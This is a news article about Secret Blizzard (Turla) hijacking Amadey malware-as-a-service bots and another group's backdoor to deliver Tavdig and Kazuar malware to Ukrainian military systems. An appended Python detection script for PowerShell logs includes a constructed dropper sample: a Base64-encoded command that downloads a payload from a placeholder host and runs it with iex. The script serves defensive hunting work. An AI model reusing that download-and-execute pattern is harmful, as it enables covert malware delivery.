The Russian state-sponsored group, known as Secret Blizzard (aka Turla), has been observed utilizing malware from other threat actors to distribute the Kazuar backdoor on targeted systems in Ukraine.
A Strategic Malware Operation
The findings, revealed by the Microsoft Threat Intelligence Team, indicate that Secret Blizzard leveraged the Amadey bot malware-as-a-service (MaaS) to deliver custom malware to systems linked to the Ukrainian military. This activity, occurring between March and April 2024, represents the second recorded instance since 2022 where the group has exploited third-party cybercrime operations to execute its espionage campaigns in Ukraine.
"Commandeering other threat actors' access highlights Secret Blizzard's approach to diversifying its attack vectors," Microsoft noted in its report shared with The Hacker News.
The hacking group employs various techniques, including:
- Adversary-in-the-Middle (AitM) attacks
- Strategic web compromises (watering hole attacks)
- Spear-phishing campaigns
A History of Espionage
Secret Blizzard is known for targeting government entities, defense departments, embassies, and ministries of foreign affairs globally. The group’s primary objective is to establish long-term covert access for intelligence gathering.
Recently, Microsoft and Lumen Technologies' Black Lotus Labs uncovered another operation by Turla, where the group hijacked 33 command-and-control (C2) servers belonging to the Pakistan-based hacking group Storm-0156 to conduct its own activities.
The latest attack involved the use of Amadey bots to deploy the Tavdig backdoor, which then delivered an updated version of Kazuar. The Kazuar malware, first documented by Palo Alto Networks’ Unit 42 in November 2023, serves as a sophisticated espionage tool for reconnaissance and data exfiltration.
Leveraging Amadey Malware-as-a-Service
Secret Blizzard appears to have either purchased access to the Amadey MaaS platform or stealthily infiltrated its C2 panels. Through that access, the Amadey bots were used to download a PowerShell dropper, which contained a Base64-encoded Amadey payload together with additional code pointing to a Turla-controlled C2 server.
Microsoft noted that encoding the dropper with a separate C2 URL may indicate that Secret Blizzard was not directly managing Amadey’s infrastructure, suggesting a more covert operational strategy.
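As an added example (not code from the article or from Microsoft's report), the following Python check illustrates how a defender could hunt for the pattern described above in PowerShell script-block logs: it decodes embedded Base64 blobs and reports any URL that appears only inside the decoded content, i.e. a second, separately encoded C2 destination hidden behind a plaintext one. The script-block text and all URLs are constructed placeholders, not indicators from the report.

```python
import base64
import binascii
import re
from typing import Optional

# Base64 runs long enough to plausibly carry code; shorter matches are mostly noise.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
URL_RE = re.compile(r"https?://[\w.\-]+(?::\d+)?(?:/[^\s'\"<>)]*)?", re.IGNORECASE)

def decode_blob(blob: str) -> Optional[str]:
    """Decode a Base64 blob as UTF-16LE (PowerShell's -EncodedCommand form) or UTF-8."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    for enc in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        # Accept only ASCII-dominant text, so binary data or a wrong encoding is skipped.
        if text and sum(32 <= ord(c) < 127 or c in "\r\n\t" for c in text) / len(text) > 0.9:
            return text
    return None

def hidden_urls(script_text: str) -> list:
    """Return URLs found only inside decoded Base64 blobs, never in the plaintext script."""
    # A plaintext URL is what an analyst expects to see; one that surfaces only after
    # decoding matches the separately encoded second C2 destination the report describes.
    visible = set(URL_RE.findall(script_text))
    hidden = set()
    for blob in B64_RE.findall(script_text):
        decoded = decode_blob(blob)
        if decoded:
            hidden.update(URL_RE.findall(decoded))
    return sorted(hidden - visible)

# Constructed samples standing in for PowerShell script-block log text (Event ID 4104).
# The hostnames are placeholders, not indicators from the report.
INNER = "Invoke-WebRequest -Uri http://second-stage.example.invalid/payload -OutFile $env:TEMP\\s.exe"
SAMPLE_DROPPER = (
    "$u='http://loader.example.invalid/amadey'; $c=[Convert]::FromBase64String('"
    + base64.b64encode(INNER.encode("utf-16-le")).decode()
    + "'); iex ([Text.Encoding]::Unicode.GetString($c))"
)
SAMPLE_BENIGN = "Get-ChildItem C:\\Users | Where-Object { $_.Name -like 'a*' }"

if __name__ == "__main__":
    for name, block in (("dropper", SAMPLE_DROPPER), ("benign", SAMPLE_BENIGN)):
        print(name, hidden_urls(block))
```

Nested encodings (a decoded blob that itself carries another Base64 blob) are not unpacked here; feeding the decoded text back through `hidden_urls` covers that case.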
A Multi-Phase Attack Chain
Once deployed, the PowerShell dropper:
- Installs a reconnaissance tool to gather details about the target system, including whether Microsoft Defender is active.
- Deploys the Tavdig backdoor alongside a legitimate Symantec binary vulnerable to DLL side-loading.
- Launches the KazuarV2 malware, enabling further reconnaissance and espionage activities.
Interestingly, Microsoft also observed Secret Blizzard reusing a PowerShell backdoor linked to another Russian hacking group, Flying Yeti (aka Storm-1837/UAC-0149), to deploy Tavdig.
Obfuscation and Attribution Challenges
The investigation is ongoing to determine how Secret Blizzard gained control over Storm-1837’s infrastructure or Amadey bots to deploy its tools.
The findings emphasize Secret Blizzard’s reliance on leveraging third-party access to obscure its presence during espionage campaigns. By exploiting other actors’ infrastructure, they complicate attribution efforts and frustrate threat analysts.
"It's not uncommon for actors to use similar tools or tactics, but using another group's infrastructure is rare," said Sherrod DeGrippo, Director of Threat Intelligence Strategy at Microsoft. "This approach acts as an effective obfuscation technique, making it harder to identify the true perpetrator and preserve operational secrecy."
Conclusion
Secret Blizzard's activities underscore the evolving complexity of state-sponsored cyber operations. By commandeering third-party tools and infrastructure, the group continues to refine its strategies, posing significant challenges for cybersecurity defenders.